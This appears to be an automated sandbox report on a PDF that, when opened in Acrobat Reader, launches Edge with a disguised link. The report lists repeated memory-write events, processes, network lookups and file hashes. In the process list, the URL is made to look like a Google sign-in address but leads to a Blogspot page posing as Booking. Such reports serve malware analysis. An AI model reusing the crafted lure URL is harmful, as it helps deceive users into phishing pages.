PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 5116 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 932 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com+signin%3Dsecure+v2+identifier%[email protected]////////atom.xml?http://www.booking.com

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x78,0x108,0x7ffaf50546f8,0x7ffaf5054708,0x7ffaf5054718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,13232100000940507287,14765235778930759139,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4820 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 booking-c.blogspot.com udp
GB 142.250.187.225:443 booking-c.blogspot.com tcp
GB 142.250.187.225:443 booking-c.blogspot.com tcp
GB 142.250.187.225:443 booking-c.blogspot.com tcp
US 8.8.8.8:53 resources.blogblog.com udp
US 8.8.8.8:53 www.blogger.com udp
GB 216.58.201.105:443 www.blogger.com tcp
GB 216.58.201.105:443 www.blogger.com tcp
US 8.8.8.8:53 225.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 ssl.google-analytics.com udp
US 8.8.8.8:53 themes.googleusercontent.com udp
GB 172.217.169.72:443 ssl.google-analytics.com tcp
GB 216.58.201.97:443 themes.googleusercontent.com tcp
GB 172.217.169.72:443 ssl.google-analytics.com udp
GB 142.250.187.225:443 booking-c.blogspot.com udp
US 8.8.8.8:53 105.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 72.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 200.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d5564ccbd62bac229941d2812fc4bfba
SHA1 0483f8496225a0f2ca0d2151fab40e8f4f61ab6d
SHA256 d259ff04090cbde3b87a54554d6e2b8a33ba81e9483acbbe3e6bad15cbde4921
SHA512 300cda7933e8af577bdc1b20e6d4279d1e418cdb0571c928b1568bfea3c231ba632ccb67313ae73ddeae5586d85db95caffaedd23e973d437f8496a8c5a15025

\??\pipe\LOCAL\crashpad_932_FNZWUEIVLJUCRGTU

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3157bf221ab927ed14c6e985eca38219
SHA1 f366af1045740b534c4f40dad21e93dc4e08c2a5
SHA256 1f1812d99435c0dbd41ddf340e6c7fbc09264135c2469deccdfc1356b69074bc
SHA512 e446104cd9708cc8281aa14a7b3d269b391c8562655d8ca219b7bc827cff80022761b8d7d1079a24512002346e4cfdb914270f0521c21435c87483f1ddcecba2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 2272c8e09f389b825e661594aabadf3c
SHA1 4a7535dc7d9f833b7036e840c2639b46a9ff0cd3
SHA256 fd8050fedb8baa87b3fcb5afb7f1077ba26ff82c5dd32345bc13b52de8bda66a
SHA512 0c285b87b28e264b20d9436f9631c4167040994fb15b6668d5bf05882a32260c8d59b85673f95de62ef95c608542b675dab239a4b28babb13eb40cd0347d74f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8fc529ae6476751c40ffe11c2bc19d3a
SHA1 139c4f034d1e46e883abe6916212ada7da9ea091
SHA256 dac9b190a0441e8e8447940f8032b40dec8a24ae51065e6bd63912f9a4024d71
SHA512 736a0ee6f83a862cbfd3d14bf91bebe3d22fd8a2b16afc8e55ff35508a78b9f0a520d025bd3ddda723b42a6b1895d19ae9050eff2f7af0046faacad5bc54fa81

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 1d1c7c7f0b54eb8ba4177f9e91af9dce
SHA1 2b0f0ceb9a374fec8258679c2a039fbce4aff396
SHA256 555c13933eae4e0b0e992713ed8118e2980442f89fbdfb06d3914b607edbbb18
SHA512 4c8930fe2c805c54c0076408aba3fbfb08c24566fba9f6a409b5b1308d39c7b26c96717d43223632f1f71d2e9e68a01b43a60031be8f1ca7a541fe0f56f4d9f2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 0dad66b7c913daee80c67f7aa254a3c3
SHA1 d171583bb38b0a47c765c4acb95d2c1f8c316b51
SHA256 50bc86bbcea12efdce5ab2b232d4c42e752f3b5384f63bdbff89804093a38c83
SHA512 5e85090ee68b36c8d4b04ec0d2edb8baff28d43eb625bf9baaa1feb56559b3bacfbca0e6dc6221d603f7e8a98feace0a528c8ff71abeb5759c46817b7916d850

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 cac8248d87ccb0a581b69a3123a86bfd
SHA1 976db3e7214c2b36693a1ebb554e3f2580a6e7ba
SHA256 828b1d5fdeeb6c141ba3a6924954dc437e039fd2deee9099dd03188d04871c9a
SHA512 a6cc29f3257f179d6ced875825f7800ca55dec6df72b76c95502ef06f8408235ef14f60aaea3f39180eb8864849876a63e3bcdbea22ddb8edfa0fba7d2d5cd61